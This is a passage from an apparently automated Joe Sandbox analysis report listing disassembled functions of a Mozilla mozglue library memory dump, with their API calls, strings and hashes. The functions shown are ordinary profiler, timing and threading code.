AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF746
GetCurrentThreadId.KERNEL32 ref: 6C6BF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6F385B,00000002,?,?,?,?,?), ref: 6C6BF829
free.MOZGLUE(?,?,00000000,?), ref: 6C6BF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C6BF866
free.MOZGLUE(?), ref: 6C6BFA0C

Part of subcall function 6C685E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6855E1), ref: 6C685E8C
Part of subcall function 6C685E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C685E9D
Part of subcall function 6C685E60: GetCurrentThreadId.KERNEL32 ref: 6C685EAB
Part of subcall function 6C685E60: GetCurrentThreadId.KERNEL32 ref: 6C685EB8
Part of subcall function 6C685E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C685ECF
Part of subcall function 6C685E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C685F27
Part of subcall function 6C685E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C685F47
Part of subcall function 6C685E60: GetCurrentProcess.KERNEL32 ref: 6C685F53
Part of subcall function 6C685E60: GetCurrentThread.KERNEL32 ref: 6C685F5C
Part of subcall function 6C685E60: GetCurrentProcess.KERNEL32 ref: 6C685F66
Part of subcall function 6C685E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C685F7E

free.MOZGLUE(?), ref: 6C6BF9C5
free.MOZGLUE(?), ref: 6C6BF9DA

Strings

Thread , xrefs: 6C6BF789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C6BF9A6
[D %d/%d] profiler_register_thread(%s), xrefs: 6C6BF71F
" attempted to re-register as ", xrefs: 6C6BF858

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: b2b17731411f6d9a1eb04d5cbac2b5cca4dbe3672d73ca9417c3ffc8de698ea1
Instruction ID: 1c95fbf066eaadd8faa3ddc6928befed1720f5ac1b0501de6c6233d33b5ead1e
Opcode Fuzzy Hash: b2b17731411f6d9a1eb04d5cbac2b5cca4dbe3672d73ca9417c3ffc8de698ea1
Instruction Fuzzy Hash: 758116796042049FD710DF25C8806AEB7B6EFC6308F40456DE95597B61EB31980ACBAF

Function 6C6BEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BEE60
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BEE6D
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C6BEEA5
CloseHandle.KERNEL32(?), ref: 6C6BEEB4
free.MOZGLUE(00000000), ref: 6C6BEEBB
GetCurrentThreadId.KERNEL32 ref: 6C6BEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BEECF

Part of subcall function 6C6BDE60: GetCurrentThreadId.KERNEL32 ref: 6C6BDE73
Part of subcall function 6C6BDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C684A68), ref: 6C6BDE7B
Part of subcall function 6C6BDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C684A68), ref: 6C6BDEB8
Part of subcall function 6C6BDE60: free.MOZGLUE(00000000,?,6C684A68), ref: 6C6BDEFE
Part of subcall function 6C6BDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C6BDF38

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

GetCurrentThreadId.KERNEL32 ref: 6C6BEF1E
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BEF2B
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BEF59
GetCurrentThreadId.KERNEL32 ref: 6C6BEFB0
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BEFBD
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BEFE1
GetCurrentThreadId.KERNEL32 ref: 6C6BEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BF000

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C6BF02F

Part of subcall function 6C6BF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6BF09B
Part of subcall function 6C6BF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C6BF0AC
Part of subcall function 6C6BF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C6BF0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C6BF008
[I %d/%d] profiler_stop, xrefs: 6C6BEED7

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: ebb5e22057c5109d9b1c669a8f4e8879712f87edcb08b6a3e2d4d16f3d979337
Instruction ID: 6b5badd45767d1df735aea609967bfc06f02954b87f39292cea45e1a7e11cc8e
Opcode Fuzzy Hash: ebb5e22057c5109d9b1c669a8f4e8879712f87edcb08b6a3e2d4d16f3d979337
Instruction Fuzzy Hash: A65104356042109FDB009B66E4887997BFBEF87358F100566EA7593B81CB314817CBAF

Function 6C685E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C685E9D

Part of subcall function 6C695B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6956EE,?,00000001), ref: 6C695B85
Part of subcall function 6C695B50: EnterCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695B90
Part of subcall function 6C695B50: LeaveCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695BD8
Part of subcall function 6C695B50: GetTickCount64.KERNEL32 ref: 6C695BE4

GetCurrentThreadId.KERNEL32 ref: 6C685EAB
GetCurrentThreadId.KERNEL32 ref: 6C685EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C685ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C686017

Part of subcall function 6C674310: moz_xmalloc.MOZGLUE(00000010,?,6C6742D2), ref: 6C67436A
Part of subcall function 6C674310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6742D2), ref: 6C674387

moz_xmalloc.MOZGLUE(00000004), ref: 6C685F47
GetCurrentProcess.KERNEL32 ref: 6C685F53
GetCurrentThread.KERNEL32 ref: 6C685F5C
GetCurrentProcess.KERNEL32 ref: 6C685F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C685F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C685F27

Part of subcall function 6C68CA10: mozalloc_abort.MOZGLUE(?), ref: 6C68CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6855E1), ref: 6C685E8C

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6855E1), ref: 6C68605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6855E1), ref: 6C6860CC

Strings

GeckoMain, xrefs: 6C685ECE, 6C686015

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: f82a1f6c1ed372da2c134eb372ada9598254839f799cd07ae2df550d27616680
Instruction ID: e27a640d1ae3835deeeb47dd936f261c3ab318a6be4f4e7f7262d07287a6707c
Opcode Fuzzy Hash: f82a1f6c1ed372da2c134eb372ada9598254839f799cd07ae2df550d27616680
Instruction Fuzzy Hash: 4C71E2B06057409FD700DF29D4C0A6ABBF1FF8A304F14496EE59687B42D731E849CBAA

Function 6C689590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6731C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C673217
Part of subcall function 6C6731C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C673236
Part of subcall function 6C6731C0: FreeLibrary.KERNEL32 ref: 6C67324B
Part of subcall function 6C6731C0: __Init_thread_footer.LIBCMT ref: 6C673260
Part of subcall function 6C6731C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C67327F
Part of subcall function 6C6731C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C67328E
Part of subcall function 6C6731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6732AB
Part of subcall function 6C6731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6732D1
Part of subcall function 6C6731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6732E5
Part of subcall function 6C6731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6732F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C689675
__Init_thread_footer.LIBCMT ref: 6C689697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6896E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C689707
__Init_thread_footer.LIBCMT ref: 6C68971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C689773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6897B7
FreeLibrary.KERNEL32 ref: 6C6897D0
FreeLibrary.KERNEL32 ref: 6C6897EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C689824

Strings

ntdll.dll, xrefs: 6C6896E3
NtMapViewOfSection, xrefs: 6C689701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C689670
MapViewOfFileNuma2, xrefs: 6C6897B1

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 8dc0dcdc27231465e6f7df14c856622812cebefb10def7ce8868a1b0772f4674
Instruction ID: 1428a9ce6749c14349f1b67a39e0adb352933a9b9f66f934febfe00896b42d7b
Opcode Fuzzy Hash: 8dc0dcdc27231465e6f7df14c856622812cebefb10def7ce8868a1b0772f4674
Instruction Fuzzy Hash: C661C8717012059FDF00CFA6F8D4B9ABBF2EB4A358F104519E92593B80D770A845CBAE

Function 6C6D6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C6FF618), ref: 6C6D6694
GetThreadId.KERNEL32(?), ref: 6C6D66B1
GetCurrentThreadId.KERNEL32 ref: 6C6D66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6D66E1
EnterCriticalSection.KERNEL32(6C6FF618), ref: 6C6D6734
GetCurrentProcess.KERNEL32 ref: 6C6D673A
LeaveCriticalSection.KERNEL32(6C6FF618), ref: 6C6D676C
GetCurrentThread.KERNEL32 ref: 6C6D67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C6D6868
RtlCaptureContext.NTDLL ref: 6C6D687F

Strings

WalkStack64, xrefs: 6C6D6890

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: fc0b8e6c4a1433fdca70eee3d918bf43d247c7543af98e5da83c132e317241fb
Instruction ID: 6e168037ebbe666c1345b308aa13a9d4b230a9dd652c5b0b17b010d3be0eda08
Opcode Fuzzy Hash: fc0b8e6c4a1433fdca70eee3d918bf43d247c7543af98e5da83c132e317241fb
Instruction Fuzzy Hash: 2451BA71A09301AFDB11CF25C884B9ABBF5BF89714F01492DF9A9C7640D770E909CB9A

Function 6C6BDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BDE73
GetCurrentThreadId.KERNEL32 ref: 6C6BDF7D
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BDF8A
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BDFC9
GetCurrentThreadId.KERNEL32 ref: 6C6BDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C684A68), ref: 6C6BDE7B

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C684A68), ref: 6C6BDEB8
free.MOZGLUE(00000000,?,6C684A68), ref: 6C6BDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C6BDF38

Strings

[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C6BE00E
[I %d/%d] locked_profiler_stop, xrefs: 6C6BDE83
<none>, xrefs: 6C6BDFD7

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: c6b3de2d8456d2539820678b0e708bf60b2f292492f889eeabe62239b1e6e96c
Instruction ID: 8162979895990de90c01ebe34518ac4f082fece7615a30830b11297d2ad352d4
Opcode Fuzzy Hash: c6b3de2d8456d2539820678b0e708bf60b2f292492f889eeabe62239b1e6e96c
Instruction Fuzzy Hash: 9741D6357051109BDB109F66E8847AE77B7EF8630CF140015E925ABB46CB71A817CBEE

Function 6C6CD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6CD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD52A
GetCurrentThreadId.KERNEL32 ref: 6C6CD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD55F
free.MOZGLUE(00000000), ref: 6C6CD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6CD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6CD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD652
GetCurrentThreadId.KERNEL32 ref: 6C6CD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD6A2

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 6d430b19fc546ac4fda8cc31e970ab139d28205058faafc6532f19712a3e4237
Instruction ID: ab5e121b7d050da7c858a6d3965035c33af4a6f28329d9b24658b4c924a5e85e
Opcode Fuzzy Hash: 6d430b19fc546ac4fda8cc31e970ab139d28205058faafc6532f19712a3e4237
Instruction Fuzzy Hash: 7A518C75604705EFC704DF35C884A9ABBF5FF8A358F00862EE95A87710DB30A845CB9A

Function 6C695670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6956D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6956E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6956F1
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C695744
??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6957BC
GetTickCount64.KERNEL32 ref: 6C6958CB
EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C6958F3
__aulldiv.LIBCMT ref: 6C695945
LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C6959B2
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C6FF638,?,?,?,?), ref: 6C6959E9

Strings

MOZ_APP_RESTART, xrefs: 6C6956CC

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
String ID: MOZ_APP_RESTART
API String ID: 2752551254-2657566371
Opcode ID: 76d84cd4fc9f21c565143466ca48514f8c399543b35b2a86fdcfcd8085666312
Instruction ID: 8ccaeea5641b1a2f6f7e166821fabf596cde0d4a1c0a472bdf202c47dafb6ba3
Opcode Fuzzy Hash: 76d84cd4fc9f21c565143466ca48514f8c399543b35b2a86fdcfcd8085666312
Instruction Fuzzy Hash: 2FC17E31A083819FDB05CF29D48065EBBF2BFCA715F058B1DE4D497660DB309885CB8A

Function 6C6BEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BEC84
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BEC8C

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

GetCurrentThreadId.KERNEL32 ref: 6C6BECA1
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BECAE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C6BECC5
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BED0A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C6BED19
CloseHandle.KERNEL32(?), ref: 6C6BED28
free.MOZGLUE(00000000), ref: 6C6BED2F
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BED59

Strings

[I %d/%d] profiler_ensure_started, xrefs: 6C6BEC94

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

